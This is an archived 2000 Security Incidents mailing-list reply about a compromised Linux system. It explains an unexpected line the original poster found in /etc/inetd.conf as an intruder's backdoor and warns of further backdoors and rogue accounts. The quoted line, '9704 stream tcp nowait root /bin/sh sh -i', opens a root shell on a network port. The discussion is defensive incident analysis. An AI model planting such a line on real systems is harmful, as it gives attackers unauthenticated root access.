Security Incidents mailing list archives
Re: Possible widespread hole?
From: Jon Lewis <jlewis () LEWIS ORG>
Date: Sun, 27 Aug 2000 13:12:43 -0400
On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:
Hi guys, I was snooping around my box yesterday, and noticed the following MAJOR hole listed at the bottom of /etc/inetd.conf: 9704 stream tcp nowait root /bin/sh sh -i I have since closed the hole, and placed my box behind a
You mean you closed _that_ hole.
/etc/inetd.conf. Is this possibly some major hole in a package that we both installed, or did we just get hacked by the same person. Seems a little weird to just be coincidence. Any advice or ideas?
Most likely, you were hacked by either the same script kid or by another using the same tool kit. It's also likely you have additional holes such as backdoors in daemons listening for network connections, perhaps even additional users in /etc/passwd. In fact last night, I was looking at some client firewall logs and noticed some linuxconf scans. I portscaned the originators and found a linux box in Korea that had been hacked by a dialup user in Indonesia. The box in Korea had a similar hole...root shell on port 8888 via a line added to inetd.conf. The hacker there had added a few accounts, and was actually telneting in, using the new accounts, both from their dialup and from another box in Korea. That second Korean box had your hole...root shell on 9704. ---------------------------------------------------------------------- Jon Lewis *jlewis () lewis org*| I route System Administrator | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
Current thread:
- Possible widespread hole? c_patin (Aug 26)
- Re: Possible widespread hole? Alexander Schreiber (Aug 27)
- Re: Possible widespread hole? An Thi-Nguyen Le (Aug 27)
- Re: Possible widespread hole? Andreas Östling (Aug 27)
- Re: Possible widespread hole? Jon Lewis (Aug 27)